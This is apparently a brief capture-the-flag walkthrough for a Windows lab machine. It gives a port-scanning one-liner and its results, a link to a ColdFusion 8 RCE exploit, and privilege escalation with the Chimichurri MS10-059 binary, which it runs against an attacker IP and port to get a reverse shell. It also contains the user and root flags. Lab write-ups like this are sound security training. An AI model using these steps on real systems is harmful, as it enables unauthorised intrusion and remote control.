Information Gathering

$ ip='10.10.10.11'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Adobe ColdFusion 8 RCE

http://10.10.10.11:8500/CFIDE/administrator/

https://www.exploit-db.com/exploits/50057

User.txt

28cec91860c0151792d28e1e925165d5

Privilege Escalation:MS10-059 Tracing Feature for Services Could

X:\\> systeminfo > systeminfo.txt

$ python2 windows-exploit-suggester.py --update

$ python2 windows-exploit-suggester.py --database 2025-02-26-mssb.xls --systeminfo systeminfo.txt

https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe

X:\\> .\Chimichurri.exe

X:\\> .\Chimichurri.exe 10.10.16.33 10032

Root.txt

ffae96561e8c4f1ee1c56e7be7c752d9